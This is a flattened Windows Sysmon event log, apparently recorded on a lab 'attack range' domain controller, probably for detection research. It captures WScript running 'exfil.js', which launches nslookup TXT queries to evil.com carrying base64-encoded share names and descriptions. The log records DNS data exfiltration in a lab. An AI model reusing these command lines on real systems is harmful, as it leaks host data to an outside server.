14:21:39.785{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.785{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-C244-000000005F02}6604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.785{2E1864BB-18E0-629A-6742-000000005F02}39761432C:\Windows\System32\WScript.exe{2E1864BB-18F3-629A-C244-000000005F02}6604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.785{2E1864BB-18F3-629A-C244-000000005F02}6604C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbhmpsa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.781{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqfkjma.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.732{2E1864BB-18F3-629A-C044-000000005F02}52287364C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-C144-000000005F02}300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.732{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.732{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.732{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.732{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.732{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-C144-000000005F02}300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.732{2E1864BB-18F3-629A-BF44-000000005F02}34482736C:\Windows\system32\cmd.exe{2E1864BB-18F3-629A-C144-000000005F02}300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.740{2E1864BB-18F3-629A-C144-000000005F02}300C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F3-629A-BF44-000000005F02}3448C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqfkjma.tmp 2>&1 10341000x8000000000000000211703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.716{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-C044-000000005F02}5228C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.716{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-C044-000000005F02}5228C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.701{2E1864BB-18F3-629A-C044-000000005F02}52287364C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-BF44-000000005F02}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.701{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-C044-000000005F02}5228C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.685{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.685{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.685{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.685{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.685{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-BF44-000000005F02}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.685{2E1864BB-18E0-629A-6742-000000005F02}39768036C:\Windows\System32\WScript.exe{2E1864BB-18F3-629A-BF44-000000005F02}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.695{2E1864BB-18F3-629A-BF44-000000005F02}3448C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqfkjma.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.685{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlayrgwnd.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.648{2E1864BB-18F3-629A-BD44-000000005F02}10087744C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-BE44-000000005F02}5000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.648{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.648{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.648{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.648{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.648{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-BE44-000000005F02}5000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 